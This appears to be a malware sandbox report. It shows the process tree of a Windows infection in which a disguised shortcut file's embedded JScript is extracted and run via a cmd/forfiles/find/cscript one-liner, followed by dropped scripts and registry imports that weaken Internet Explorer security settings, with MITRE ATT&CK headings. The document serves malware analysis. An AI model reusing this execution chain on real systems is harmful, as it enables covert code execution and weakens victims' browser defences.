  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "3.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "3.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "3.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1156
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:452
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:988
  - - C:\Windows\System32\cscript.exe
      "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1084
    - - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1656
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.reg
        6⤵
        
        PID:112
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\mediaIE.reg
        6⤵
        Modifies Internet Explorer Automatic Crash Recovery
        Modifies Internet Explorer Phishing Filter
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        
        PID:556
      - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        6⤵
        
        PID:836

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1744 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1656-65-0x0000000001E60000-0x0000000001E70000-memory.dmp

Filesize
64KB

Download
memory/1796-54-0x000007FEFC321000-0x000007FEFC323000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads